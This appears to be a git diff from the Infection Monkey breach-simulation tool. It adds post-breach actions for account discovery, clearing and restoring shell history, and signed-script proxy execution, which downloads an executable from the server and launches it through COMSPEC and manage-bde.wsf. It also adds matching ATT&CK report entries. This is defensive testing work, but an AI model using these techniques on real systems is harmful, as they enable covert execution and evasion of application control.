b/docs/content/usage/use-cases/ids-test.md index 9d5cbb154..89b1bbfb3 100644 --- a/docs/content/usage/use-cases/ids-test.md +++ b/docs/content/usage/use-cases/ids-test.md @@ -1,7 +1,8 @@ --- title: "IDS/IPS Test" date: 2020-08-12T13:07:47+03:00 -draft: true +draft: false +description: "Test your network defence solutions." weight: 5 --- @@ -24,7 +25,7 @@ Running the Monkey on both the Island and on a few other machines in the network as it increases coverage and propagation rates. -![Post breach configuration](/images/usage/scenarios/ids-test.png "Post breach configuration") +![Post breach configuration](/images/usage/use-cases/ids-test.PNG "Post breach configuration") ## Assessing results @@ -50,5 +51,5 @@ While running this scenario, be on the lookout for the action that should arise: Lastly, check Zero Trust and Mitre ATT&CK reports, to see which attacks can be executed on the network and how to fix it. - ![Map](/images/usage/scenarios/map-full-cropped.png "Map") + ![Map](/images/usage/use-cases/map-full-cropped.png "Map") diff --git a/docs/content/usage/use-cases/network-breach.md b/docs/content/usage/use-cases/network-breach.md index 84b0a9ab9..46aee7228 100644 --- a/docs/content/usage/use-cases/network-breach.md +++ b/docs/content/usage/use-cases/network-breach.md @@ -1,7 +1,8 @@ --- title: "Network Breach" date: 2020-08-12T13:04:55+03:00 -draft: true +draft: false +description: "Simulate an internal network breach and assess the potential impact." weight: 1 --- diff --git a/docs/content/usage/use-cases/network-segmentation.md b/docs/content/usage/use-cases/network-segmentation.md index 6884b0c48..8b418c1b6 100644 --- a/docs/content/usage/use-cases/network-segmentation.md +++ b/docs/content/usage/use-cases/network-segmentation.md @@ -1,7 +1,8 @@ --- title: "Network Segmentation" date: 2020-08-12T13:05:05+03:00 -draft: true +draft: false +description: "Test network segmentation policies for apps that need ringfencing or tiers that require microsegmentation." weight: 3 --- diff --git a/docs/content/usage/use-cases/other.md b/docs/content/usage/use-cases/other.md index 71405114d..b709d8ba3 100644 --- a/docs/content/usage/use-cases/other.md +++ b/docs/content/usage/use-cases/other.md @@ -1,7 +1,8 @@ --- title: "Other" date: 2020-08-12T13:07:55+03:00 -draft: true +draft: false +description: "Tips and tricks about configuring monkey for your needs." weight: 100 --- diff --git a/monkey/common/data/api_url_consts.py b/monkey/common/data/api_url_consts.py new file mode 100644 index 000000000..4fef6b11b --- /dev/null +++ b/monkey/common/data/api_url_consts.py @@ -0,0 +1 @@ +T1216_PBA_FILE_DOWNLOAD_PATH = '/api/t1216-pba/download' diff --git a/monkey/common/data/post_breach_consts.py b/monkey/common/data/post_breach_consts.py index c3bba9950..ec9f4a823 100644 --- a/monkey/common/data/post_breach_consts.py +++ b/monkey/common/data/post_breach_consts.py @@ -6,3 +6,6 @@ POST_BREACH_HIDDEN_FILES = "Hide files and directories" POST_BREACH_TRAP_COMMAND = "Execute command when a particular signal is received" POST_BREACH_SETUID_SETGID = "Setuid and Setgid" POST_BREACH_JOB_SCHEDULING = "Schedule jobs" +POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC = "Signed script proxy execution" +POST_BREACH_ACCOUNT_DISCOVERY = "Account discovery" +POST_BREACH_CLEAR_CMD_HISTORY = "Clear command history" diff --git a/monkey/infection_monkey/control.py b/monkey/infection_monkey/control.py index 77f3779b2..35922286f 100644 --- a/monkey/infection_monkey/control.py +++ b/monkey/infection_monkey/control.py @@ -2,12 +2,14 @@ import json import logging import platform from socket import gethostname +from urllib.parse import urljoin import requests from requests.exceptions import ConnectionError import infection_monkey.monkeyfs as monkeyfs import infection_monkey.tunnel as tunnel +from common.data.api_url_consts import T1216_PBA_FILE_DOWNLOAD_PATH from infection_monkey.config import GUID, WormConfiguration from infection_monkey.network.info import check_internet_access, local_ips from infection_monkey.transport.http import HTTPConnectProxy @@ -325,6 +327,17 @@ class ControlClient(object): except requests.exceptions.RequestException: return False + @staticmethod + def get_T1216_pba_file(): + try: + return requests.get(urljoin(f"https://{WormConfiguration.current_server}/", # noqa: DUO123 + T1216_PBA_FILE_DOWNLOAD_PATH), + verify=False, + proxies=ControlClient.proxies, + stream=True) + except requests.exceptions.RequestException: + return False + @staticmethod def should_monkey_run(vulnerable_port: str) -> bool: if vulnerable_port and \ diff --git a/monkey/infection_monkey/post_breach/account_discovery/account_discovery.py b/monkey/infection_monkey/post_breach/account_discovery/account_discovery.py new file mode 100644 index 000000000..952592ace --- /dev/null +++ b/monkey/infection_monkey/post_breach/account_discovery/account_discovery.py @@ -0,0 +1,10 @@ +from infection_monkey.post_breach.account_discovery.linux_account_discovery import \ + get_linux_commands_to_discover_accounts +from infection_monkey.post_breach.account_discovery.windows_account_discovery import \ + get_windows_commands_to_discover_accounts + + +def get_commands_to_discover_accounts(): + linux_cmds = get_linux_commands_to_discover_accounts() + windows_cmds = get_windows_commands_to_discover_accounts() + return linux_cmds, windows_cmds diff --git a/monkey/infection_monkey/post_breach/account_discovery/linux_account_discovery.py b/monkey/infection_monkey/post_breach/account_discovery/linux_account_discovery.py new file mode 100644 index 000000000..21725e509 --- /dev/null +++ b/monkey/infection_monkey/post_breach/account_discovery/linux_account_discovery.py @@ -0,0 +1,7 @@ +def get_linux_commands_to_discover_accounts(): + return [ + "echo \'Discovered the following user accounts:\'; ", + "cut -d: -f1,3 /etc/passwd | ", + "egrep ':[0-9]{4}$' | ", + "cut -d: -f1" + ] diff --git a/monkey/infection_monkey/post_breach/account_discovery/windows_account_discovery.py b/monkey/infection_monkey/post_breach/account_discovery/windows_account_discovery.py new file mode 100644 index 000000000..a37054c35 --- /dev/null +++ b/monkey/infection_monkey/post_breach/account_discovery/windows_account_discovery.py @@ -0,0 +1,2 @@ +def get_windows_commands_to_discover_accounts(): + return "powershell Get-LocalUser" diff --git a/monkey/infection_monkey/post_breach/actions/clear_command_history.py b/monkey/infection_monkey/post_breach/actions/clear_command_history.py new file mode 100644 index 000000000..afd26996f --- /dev/null +++ b/monkey/infection_monkey/post_breach/actions/clear_command_history.py @@ -0,0 +1,50 @@ +import subprocess + +from common.data.post_breach_consts import POST_BREACH_CLEAR_CMD_HISTORY +from infection_monkey.post_breach.clear_command_history.clear_command_history import \ + get_commands_to_clear_command_history +from infection_monkey.post_breach.pba import PBA +from infection_monkey.telemetry.post_breach_telem import PostBreachTelem + + +class ClearCommandHistory(PBA): + def __init__(self): + super().__init__(name=POST_BREACH_CLEAR_CMD_HISTORY) + + def run(self): + results = [pba.run() for pba in self.clear_command_history_PBA_list()] + if results: + PostBreachTelem(self, results).send() + + def clear_command_history_PBA_list(self): + return self.CommandHistoryPBAGenerator().get_clear_command_history_pbas() + + class CommandHistoryPBAGenerator(): + def get_clear_command_history_pbas(self): + (cmds_for_linux, command_history_files_for_linux, usernames_for_linux) =\ + get_commands_to_clear_command_history() + + pbas = [] + + for username in usernames_for_linux: + for command_history_file in command_history_files_for_linux: + linux_cmds = ' '.join(cmds_for_linux).format(command_history_file).format(username) + pbas.append(self.ClearCommandHistoryFile(linux_cmds=linux_cmds)) + + return pbas + + class ClearCommandHistoryFile(PBA): + def __init__(self, linux_cmds): + super().__init__(name=POST_BREACH_CLEAR_CMD_HISTORY, + linux_cmd=linux_cmds) + + def run(self): + if self.command: + try: + output = subprocess.check_output(self.command, # noqa: DUO116 + stderr=subprocess.STDOUT, + shell=True).decode() + return output, True + except subprocess.CalledProcessError as e: + # Return error output of the command + return e.output.decode(), False diff --git a/monkey/infection_monkey/post_breach/actions/discover_accounts.py b/monkey/infection_monkey/post_breach/actions/discover_accounts.py new file mode 100644 index 000000000..8eaab9e38 --- /dev/null +++ b/monkey/infection_monkey/post_breach/actions/discover_accounts.py @@ -0,0 +1,12 @@ +from common.data.post_breach_consts import POST_BREACH_ACCOUNT_DISCOVERY +from infection_monkey.post_breach.account_discovery.account_discovery import \ + get_commands_to_discover_accounts +from infection_monkey.post_breach.pba import PBA + + +class AccountDiscovery(PBA): + def __init__(self): + linux_cmds, windows_cmds = get_commands_to_discover_accounts() + super().__init__(POST_BREACH_ACCOUNT_DISCOVERY, + linux_cmd=' '.join(linux_cmds), + windows_cmd=windows_cmds) diff --git a/monkey/infection_monkey/post_breach/actions/use_signed_scripts.py b/monkey/infection_monkey/post_breach/actions/use_signed_scripts.py new file mode 100644 index 000000000..17eb86337 --- /dev/null +++ b/monkey/infection_monkey/post_breach/actions/use_signed_scripts.py @@ -0,0 +1,30 @@ +import logging +import subprocess + +from common.data.post_breach_consts import POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC +from infection_monkey.post_breach.pba import PBA +from infection_monkey.post_breach.signed_script_proxy.signed_script_proxy import ( + cleanup_changes, get_commands_to_proxy_execution_using_signed_script) +from infection_monkey.utils.environment import is_windows_os + +LOG = logging.getLogger(__name__) + + +class SignedScriptProxyExecution(PBA): + def __init__(self): + windows_cmds = get_commands_to_proxy_execution_using_signed_script() + super().__init__(POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC, + windows_cmd=' '.join(windows_cmds)) + + def run(self): + try: + original_comspec = '' + if is_windows_os(): + original_comspec =\ + subprocess.check_output('if defined COMSPEC echo %COMSPEC%', shell=True).decode() # noqa: DUO116 + + super().run() + except Exception as e: + LOG.warning(f"An exception occurred on running PBA {POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC}: {str(e)}") + finally: + cleanup_changes(original_comspec) diff --git a/monkey/infection_monkey/post_breach/clear_command_history/clear_command_history.py b/monkey/infection_monkey/post_breach/clear_command_history/clear_command_history.py new file mode 100644 index 000000000..67c600a5d --- /dev/null +++ b/monkey/infection_monkey/post_breach/clear_command_history/clear_command_history.py @@ -0,0 +1,12 @@ +from infection_monkey.post_breach.clear_command_history.linux_clear_command_history import ( + get_linux_command_history_files, + get_linux_commands_to_clear_command_history, get_linux_usernames) + + +def get_commands_to_clear_command_history(): + (linux_cmds, + linux_cmd_hist_files, + linux_usernames) = (get_linux_commands_to_clear_command_history(), + get_linux_command_history_files(), + get_linux_usernames()) + return linux_cmds, linux_cmd_hist_files, linux_usernames diff --git a/monkey/infection_monkey/post_breach/clear_command_history/linux_clear_command_history.py b/monkey/infection_monkey/post_breach/clear_command_history/linux_clear_command_history.py new file mode 100644 index 000000000..a3545f124 --- /dev/null +++ b/monkey/infection_monkey/post_breach/clear_command_history/linux_clear_command_history.py @@ -0,0 +1,55 @@ +import subprocess + +from infection_monkey.utils.environment import is_windows_os + + +def get_linux_commands_to_clear_command_history(): + if is_windows_os(): + return '' + + TEMP_HIST_FILE = '$HOME/monkey-temp-hist-file' + + return [ + '3<{0} 3<&- && ', # check for existence of file + 'cat {0} ' # copy contents of history file to... + f'> {TEMP_HIST_FILE} && ', # ...temporary file + 'echo > {0} && ', # clear contents of file + 'echo \"Successfully cleared {0}\" && ', # if successfully cleared + f'cat {TEMP_HIST_FILE} ', # restore history file back with... + '> {0} ;' # ...original contents + f'rm {TEMP_HIST_FILE} -f' # remove temp history file + ] + + +def get_linux_command_history_files(): + if is_windows_os(): + return [] + + HOME_DIR = "/home/" + + # get list of paths of different shell history files (default values) with place for username + STARTUP_FILES = [ + file_path.format(HOME_DIR) for file_path in + [ + "{0}{{0}}/.bash_history", # bash + "{0}{{0}}/.local/share/fish/fish_history", # fish + "{0}{{0}}/.zsh_history", # zsh + "{0}{{0}}/.sh_history", # ksh + "{0}{{0}}/.history" # csh, tcsh + ] + ] + + return STARTUP_FILES + + +def get_linux_usernames(): + if is_windows_os(): + return [] + + # get list of usernames + USERS = subprocess.check_output( # noqa: DUO116 + "cut -d: -f1,3 /etc/passwd | egrep ':[0-9]{4}$' | cut -d: -f1", + shell=True + ).decode().split('\n')[:-1] + + return USERS diff --git a/monkey/infection_monkey/post_breach/signed_script_proxy/signed_script_proxy.py b/monkey/infection_monkey/post_breach/signed_script_proxy/signed_script_proxy.py new file mode 100644 index 000000000..f39343577 --- /dev/null +++ b/monkey/infection_monkey/post_breach/signed_script_proxy/signed_script_proxy.py @@ -0,0 +1,18 @@ +import subprocess + +from infection_monkey.post_breach.signed_script_proxy.windows.signed_script_proxy import ( + get_windows_commands_to_delete_temp_comspec, + get_windows_commands_to_proxy_execution_using_signed_script, + get_windows_commands_to_reset_comspec) +from infection_monkey.utils.environment import is_windows_os + + +def get_commands_to_proxy_execution_using_signed_script(): + windows_cmds = get_windows_commands_to_proxy_execution_using_signed_script() + return windows_cmds + + +def cleanup_changes(original_comspec): + if is_windows_os(): + subprocess.run(get_windows_commands_to_reset_comspec(original_comspec), shell=True) # noqa: DUO116 + subprocess.run(get_windows_commands_to_delete_temp_comspec(), shell=True) # noqa: DUO116 diff --git a/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py b/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py new file mode 100644 index 000000000..6cdf5fe01 --- /dev/null +++ b/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py @@ -0,0 +1,28 @@ +import os + +from infection_monkey.control import ControlClient + +TEMP_COMSPEC = os.path.join(os.getcwd(), 'random_executable.exe') + + +def get_windows_commands_to_proxy_execution_using_signed_script(): + download = ControlClient.get_T1216_pba_file() + with open(TEMP_COMSPEC, 'wb') as random_exe_obj: + random_exe_obj.write(download.content) + random_exe_obj.flush() + + windir_path = os.environ['WINDIR'] + signed_script = os.path.join(windir_path, 'System32', 'manage-bde.wsf') + + return [ + f'set comspec={TEMP_COMSPEC} &&', + f'cscript {signed_script}' + ] + + +def get_windows_commands_to_reset_comspec(original_comspec): + return f'set comspec={original_comspec}' + + +def get_windows_commands_to_delete_temp_comspec(): + return f'del {TEMP_COMSPEC} /f' diff --git a/monkey/monkey_island/cc/app.py b/monkey/monkey_island/cc/app.py index c5b4d128f..e8dfd2cfc 100644 --- a/monkey/monkey_island/cc/app.py +++ b/monkey/monkey_island/cc/app.py @@ -6,6 +6,7 @@ from flask import Flask, Response, send_from_directory from werkzeug.exceptions import NotFound import monkey_island.cc.environment.environment_singleton as env_singleton +from common.data.api_url_consts import T1216_PBA_FILE_DOWNLOAD_PATH from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH from monkey_island.cc.database import database, mongo from monkey_island.cc.resources.attack.attack_config import AttackConfiguration @@ -35,6 +36,8 @@ from monkey_island.cc.resources.pba_file_upload import FileUpload from monkey_island.cc.resources.remote_run import RemoteRun from monkey_island.cc.resources.reporting.report import Report from monkey_island.cc.resources.root import Root +from monkey_island.cc.resources.T1216_pba_file_download import \ + T1216PBAFileDownload from monkey_island.cc.resources.telemetry import Telemetry from monkey_island.cc.resources.telemetry_feed import TelemetryFeed from monkey_island.cc.resources.test.clear_caches import ClearCaches @@ -130,6 +133,7 @@ def init_api_resources(api): api.add_resource(Log, '/api/log', '/api/log/') api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/') api.add_resource(PBAFileDownload, '/api/pba/download/') + api.add_resource(T1216PBAFileDownload, T1216_PBA_FILE_DOWNLOAD_PATH) api.add_resource(FileUpload, '/api/fileUpload/', '/api/fileUpload/?load=', '/api/fileUpload/?restore=') diff --git a/monkey/monkey_island/cc/resources/T1216_pba_file_download.py b/monkey/monkey_island/cc/resources/T1216_pba_file_download.py new file mode 100644 index 000000000..104c113f4 --- /dev/null +++ b/monkey/monkey_island/cc/resources/T1216_pba_file_download.py @@ -0,0 +1,17 @@ +import os + +import flask_restful +from flask import send_from_directory + +from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH + + +class T1216PBAFileDownload(flask_restful.Resource): + """ + File download endpoint used by monkey to download executable file for T1216 ("Signed Script Proxy Execution" PBA) + """ + + def get(self): + executable_file_name = 'T1216_random_executable.exe' + return send_from_directory(directory=os.path.join(MONKEY_ISLAND_ABS_PATH, 'cc', 'resources', 'pba'), + filename=executable_file_name) diff --git a/monkey/monkey_island/cc/resources/pba/T1216_random_executable.exe b/monkey/monkey_island/cc/resources/pba/T1216_random_executable.exe new file mode 100644 index 000000000..88335be70 Binary files /dev/null and b/monkey/monkey_island/cc/resources/pba/T1216_random_executable.exe differ diff --git a/monkey/monkey_island/cc/services/attack/attack_report.py b/monkey/monkey_island/cc/services/attack/attack_report.py index 6d4bac9ed..f14ad7aa6 100644 --- a/monkey/monkey_island/cc/services/attack/attack_report.py +++ b/monkey/monkey_island/cc/services/attack/attack_report.py @@ -10,15 +10,17 @@ from monkey_island.cc.services.attack.technique_reports import (T1003, T1005, T1059, T1064, T1065, T1075, T1082, T1086, - T1090, T1105, - T1106, T1107, - T1110, T1129, - T1136, T1145, + T1087, T1090, + T1105, T1106, + T1107, T1110, + T1129, T1136, + T1145, T1146, T1154, T1156, T1158, T1166, T1168, T1188, T1197, T1210, - T1222, T1504) + T1216, T1222, + T1504) from monkey_island.cc.services.reporting.report_generation_synchronisation import \ safe_generate_attack_report @@ -57,7 +59,10 @@ TECHNIQUES = {'T1210': T1210.T1210, 'T1154': T1154.T1154, 'T1166': T1166.T1166, 'T1168': T1168.T1168, - 'T1053': T1053.T1053 + 'T1053': T1053.T1053, + 'T1216': T1216.T1216, + 'T1087': T1087.T1087, + 'T1146': T1146.T1146 } REPORT_NAME = 'new_report' diff --git a/monkey/monkey_island/cc/services/attack/attack_schema.py b/monkey/monkey_island/cc/services/attack/attack_schema.py index 30d33ca3e..366a86aa7 100644 --- a/monkey/monkey_island/cc/services/attack/attack_schema.py +++ b/monkey/monkey_island/cc/services/attack/attack_schema.py @@ -168,6 +168,15 @@ SCHEMA = { "description": "Adversaries may abuse BITS to download, execute, " "and even clean up after running malicious code." }, + "T1146": { + "title": "Clear command history", + "type": "bool", + "value": False, + "necessary": False, + "link": "https://attack.mitre.org/techniques/T1146", + "description": "Adversaries may clear/disable command history of a compromised " + "account to conceal the actions undertaken during an intrusion." + }, "T1107": { "title": "File Deletion", "type": "bool", @@ -185,6 +194,15 @@ SCHEMA = { "necessary": True, "link": "https://attack.mitre.org/techniques/T1222", "description": "Adversaries may modify file permissions/attributes to evade intended DACLs." + }, + "T1216": { + "title": "Signed script proxy execution", + "type": "bool", + "value": False, + "necessary": False, + "link": "https://attack.mitre.org/techniques/T1216", + "description": "Adversaries may use scripts signed with trusted certificates to " + "proxy execution of malicious files on Windows systems." } } }, @@ -234,6 +252,16 @@ SCHEMA = { "type": "object", "link": "https://attack.mitre.org/tactics/TA0007/", "properties": { + "T1087": { + "title": "Account Discovery", + "type": "bool", + "value": True, + "necessary": False, + "link": "https://attack.mitre.org/techniques/T1087", + "description": "Adversaries may attempt to get a listing of accounts on a system or " + "within an environment. This information can help adversaries determine which " + "accounts exist to aid in follow-on behavior." + }, "T1018": { "title": "Remote System Discovery", "type": "bool", diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1087.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1087.py new file mode 100644 index 000000000..de0a6a470 --- /dev/null +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1087.py @@ -0,0 +1,13 @@ +from common.data.post_breach_consts import POST_BREACH_ACCOUNT_DISCOVERY +from monkey_island.cc.services.attack.technique_reports.pba_technique import \ + PostBreachTechnique + +__author__ = "shreyamalviya" + + +class T1087(PostBreachTechnique): + tech_id = "T1087" + unscanned_msg = "Monkey didn't try to get a listing of user accounts." + scanned_msg = "Monkey tried to get a listing of user accounts but failed to do so." + used_msg = "Monkey got a listing of user accounts successfully." + pba_names = [POST_BREACH_ACCOUNT_DISCOVERY] diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1146.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1146.py new file mode 100644 index 000000000..cacbe6789 --- /dev/null +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1146.py @@ -0,0 +1,22 @@ +from common.data.post_breach_consts import POST_BREACH_CLEAR_CMD_HISTORY +from monkey_island.cc.services.attack.technique_reports.pba_technique import \ + PostBreachTechnique + +__author__ = "shreyamalviya" + + +class T1146(PostBreachTechnique): + tech_id = "T1146" + unscanned_msg = "Monkey didn't try clearing the command history since it didn't run on any Linux machines." + scanned_msg = "Monkey tried clearing the command history but failed." + used_msg = "Monkey successfully cleared the command history (and then restored it back)." + pba_names = [POST_BREACH_CLEAR_CMD_HISTORY] + + @staticmethod + def get_pba_query(*args): + return [{'$match': {'telem_category': 'post_breach', + 'data.name': POST_BREACH_CLEAR_CMD_HISTORY}}, + {'$project': {'_id': 0, + 'machine': {'hostname': {'$arrayElemAt': ['$data.hostname', 0]}, + 'ips': [{'$arrayElemAt': ['$data.ip', 0]}]}, + 'result': '$data.result'}}] diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1216.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1216.py new file mode 100644 index 000000000..d4efbd73e --- /dev/null +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1216.py @@ -0,0 +1,21 @@ +from common.data.post_breach_consts import POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC +from monkey_island.cc.services.attack.technique_reports.pba_technique import \ + PostBreachTechnique + +__author__ = "shreyamalviya" + + +class T1216(PostBreachTechnique): + tech_id = "T1216" + unscanned_msg = "Monkey didn't attempt to execute an arbitrary program with the help of a " +\ + "pre-existing signed script since it didn't run on any Windows machines. " +\ + "If successful, this behavior could be abused by adversaries to execute malicious files that could " +\ + "bypass application control and signature validation on systems." + scanned_msg = "Monkey attempted to execute an arbitrary program with the help of a " +\ + "pre-existing signed script on Windows but failed. " +\ + "If successful, this behavior could be abused by adversaries to execute malicious files that could " +\ + "bypass application control and signature validation on systems." + used_msg = "Monkey executed an arbitrary program with the help of a pre-existing signed script on Windows. " +\ + "This behavior could be abused by adversaries to execute malicious files that could " +\ + "bypass application control and signature validation on systems." + pba_names = [POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC] diff --git a/monkey/monkey_island/cc/services/config_schema/definitions/post_breach_actions.py b/monkey/monkey_island/cc/services/config_schema/definitions/post_breach_actions.py index f3e2a9bfa..f61bcbeda 100644 --- a/monkey/monkey_island/cc/services/config_schema/definitions/post_breach_actions.py +++ b/monkey/monkey_island/cc/services/config_schema/definitions/post_breach_actions.py @@ -70,6 +70,34 @@ POST_BREACH_ACTIONS = { "title": "Job scheduling", "info": "Attempts to create a scheduled job on the system and remove it.", "attack_techniques": ["T1168", "T1053"] + }, + { + "type": "string", + "enum": [ + "SignedScriptProxyExecution" + ], + "title": "Signed script proxy execution", + "info": "On Windows systems, attemps to execute an arbitrary file " + "with the help of a pre-existing signed script.", + "attack_techniques": ["T1216"] + }, + { + "type": "string", + "enum": [ + "AccountDiscovery" + ], + "title": "Account Discovery", + "info": "Attempts to get a listing of user accounts on the system.", + "attack_techniques": ["T1087"] + }, + { + "type": "string", + "enum": [ + "ClearCommandHistory" + ], + "title": "Clear command history", + "info": "Attempts to clear the command history.", + "attack_techniques": ["T1146"] } ] } diff --git a/monkey/monkey_island/cc/services/config_schema/monkey.py b/monkey/monkey_island/cc/services/config_schema/monkey.py index dd10cb35b..c9fbdde74 100644 --- a/monkey/monkey_island/cc/services/config_schema/monkey.py +++ b/monkey/monkey_island/cc/services/config_schema/monkey.py @@ -67,7 +67,8 @@ MONKEY = { "HiddenFiles", "TrapCommand", "ChangeSetuidSetgid", - "ScheduleJobs" + "ScheduleJobs", + "AccountDiscovery" ] }, } diff --git a/monkey/monkey_island/cc/ui/package-lock.json b/monkey/monkey_island/cc/ui/package-lock.json index 412d77849..f17b3ddd3 100644 --- a/monkey/monkey_island/cc/ui/package-lock.json +++ b/monkey/monkey_island/cc/ui/package-lock.json @@ -1310,14 +1310,14 @@ } }, "@sindresorhus/is": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@sindresorhus/is/-/is-3.1.0.tgz", - "integrity": "sha512-n4J+zu52VdY43kdi/XdI9DzuMr1Mur8zFL5ZRG2opCans9aiFwkPxHYFEb5Xgy7n1Z4K6WfI4FpqUqsh3E8BPQ==" + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/@sindresorhus/is/-/is-3.1.1.tgz", + "integrity": "sha512-tLnujxFtfH7F+i5ghUfgGlJsvyCKvUnSMFMlWybFdX9/DdX8svb4Zwx1gV0gkkVCHXtmPSetoAR3QlKfOld6Tw==" }, "@snyk/cli-interface": { - "version": "2.8.0", - "resolved": "https://registry.npmjs.org/@snyk/cli-interface/-/cli-interface-2.8.0.tgz", - "integrity": "sha512-St/G39iJG1zQK15L24kcVYM2gmFc/ylBCcBqU2DMZKJKwOPccKLUO6s+dWIUXMccQ+DFS6TuHPvuAKQNi9C4Yg==", + "version": "2.8.1", + "resolved": "https://registry.npmjs.org/@snyk/cli-interface/-/cli-interface-2.8.1.tgz", + "integrity": "sha512-pALcfgoY0hAavy/pBlDIqEu+FFC5m+D4bMnCwlQ26mObL/zzxp2+Ohx+HykCIom62u2J94SzAtRLFdm/2TgoOw==", "requires": { "@snyk/dep-graph": "1.19.0", "@snyk/graphlib": "2.1.9-patch", @@ -1550,9 +1550,9 @@ } }, "@snyk/java-call-graph-builder": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/@snyk/java-call-graph-builder/-/java-call-graph-builder-1.10.0.tgz", - "integrity": "sha512-x3vKElHJRsPjlMBRACeD6kHtki54ffahYeAm4ny5epVpxm16/OT6f6AjNjPuX8DbxcauaD7wqirtc62OPH3YqA==", + "version": "1.12.1", + "resolved": "https://registry.npmjs.org/@snyk/java-call-graph-builder/-/java-call-graph-builder-1.12.1.tgz", + "integrity": "sha512-thaLaqwXYkvVKs1gqmCAB5aFvwp2cz84rFlODr93smG6E8s7U+KNMiiiWq1KjSvbRe3AN8YUENYGyUoGRu9m1w==", "requires": { "@snyk/graphlib": "2.1.9-patch", "ci-info": "^2.0.0", @@ -1593,16 +1593,6 @@ "integrity": "sha512-bWjQY5Xk3TcfVpeo8M5BhhSUEdPr2P19AWW13CHPu6sFZkckLWEcjQycnBsVD6RBmxGXecJ1YNui8dq6soHoYQ==", "requires": { "event-loop-spinner": "^2.0.0" - }, - "dependencies": { - "event-loop-spinner": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/event-loop-spinner/-/event-loop-spinner-2.0.0.tgz", - "integrity": "sha512-1y4j/Mhttr8ordvHkbDsGzGrlQaSYJoXD/3YKUxiOXIk7myEn9UPfybEk/lLtrcU3D4QvCNmVUxVQaPtvAIaUw==", - "requires": { - "tslib": "^1.10.0" - } - } } }, "@snyk/ruby-semver": { @@ -5568,9 +5558,9 @@ "dev": true }, "event-loop-spinner": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/event-loop-spinner/-/event-loop-spinner-1.1.0.tgz", - "integrity": "sha512-YVFs6dPpZIgH665kKckDktEVvSBccSYJmoZUfhNUdv5d3Xv+Q+SKF4Xis1jolq9aBzuW1ZZhQh/m/zU/TPdDhw==", + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/event-loop-spinner/-/event-loop-spinner-2.0.0.tgz", + "integrity": "sha512-1y4j/Mhttr8ordvHkbDsGzGrlQaSYJoXD/3YKUxiOXIk7myEn9UPfybEk/lLtrcU3D4QvCNmVUxVQaPtvAIaUw==", "requires": { "tslib": "^1.10.0" } @@ -14914,11 +14904,11 @@ } }, "snyk": { - "version": "1.363.0", - "resolved": "https://registry.npmjs.org/snyk/-/snyk-1.363.0.tgz", - "integrity": "sha512-hFmVOcMOEgAlEUcag65ZoFRvJufwB0Z8yUOKqyjWODiyeyW+eAxkUcIjVNuMjamxdXQHVJU78Tdq5Y7moI380g==", + "version": "1.368.0", + "resolved": "https://registry.npmjs.org/snyk/-/snyk-1.368.0.tgz", + "integrity": "sha512-ZwX0VxxKVBKqmycPiTpx2El1hPEeNJNKQRyez0yFtIlUM3FscsOpgtfRFWNQKA6znkI075JIpmmShpcrQRLpcQ==", "requires": { - "@snyk/cli-interface": "2.8.0", + "@snyk/cli-interface": "2.8.1", "@snyk/dep-graph": "1.18.3", "@snyk/gemfile": "1.2.0", "@snyk/graphlib": "2.1.9-patch", @@ -14941,11 +14931,11 @@ "proxy-from-env": "^1.0.0", "semver": "^6.0.0", "snyk-config": "3.1.0", - "snyk-docker-plugin": "3.13.1", + "snyk-docker-plugin": "3.16.0", "snyk-go-plugin": "1.16.0", "snyk-gradle-plugin": "3.5.1", "snyk-module": "3.1.0", - "snyk-mvn-plugin": "2.17.1", + "snyk-mvn-plugin": "2.18.0", "snyk-nodejs-lockfile-parser": "1.26.3", "snyk-nuget-plugin": "1.18.1", "snyk-php-plugin": "1.9.0", @@ -15028,22 +15018,24 @@ } }, "snyk-docker-plugin": { - "version": "3.13.1", - "resolved": "https://registry.npmjs.org/snyk-docker-plugin/-/snyk-docker-plugin-3.13.1.tgz", - "integrity": "sha512-4GEZ8Rx+1K33i0SuMRO03T+n8jAosLae4iuo1TZu9ugkxdQzbBStzVFz2N6x1s0GI/psWQNOWSLKfzFJYMOctw==", + "version": "3.16.0", + "resolved": "https://registry.npmjs.org/snyk-docker-plugin/-/snyk-docker-plugin-3.16.0.tgz", + "integrity": "sha512-i11WxMhsZxcFKn123LeA+u77NN7uWqWgPfQ6dvkACJnvouWHZidkOAxBOmYU49x8VS7dEQSe2Ym0bgr6EHn4cQ==", "requires": { "@snyk/rpm-parser": "^2.0.0", - "@snyk/snyk-docker-pull": "^3.1.3", + "@snyk/snyk-docker-pull": "^3.2.0", "debug": "^4.1.1", "docker-modem": "2.1.3", "dockerfile-ast": "0.0.19", - "event-loop-spinner": "^1.1.0", + "event-loop-spinner": "^2.0.0", "gunzip-maybe": "^1.4.2", + "mkdirp": "^1.0.4", "semver": "^6.1.0", "snyk-nodejs-lockfile-parser": "1.22.0", "tar-stream": "^2.1.0", "tmp": "^0.2.1", - "tslib": "^1" + "tslib": "^1", + "uuid": "^8.2.0" }, "dependencies": { "debug": { @@ -15054,6 +15046,11 @@ "ms": "^2.1.1" } }, + "mkdirp": { + "version": "1.0.4", + "resolved": 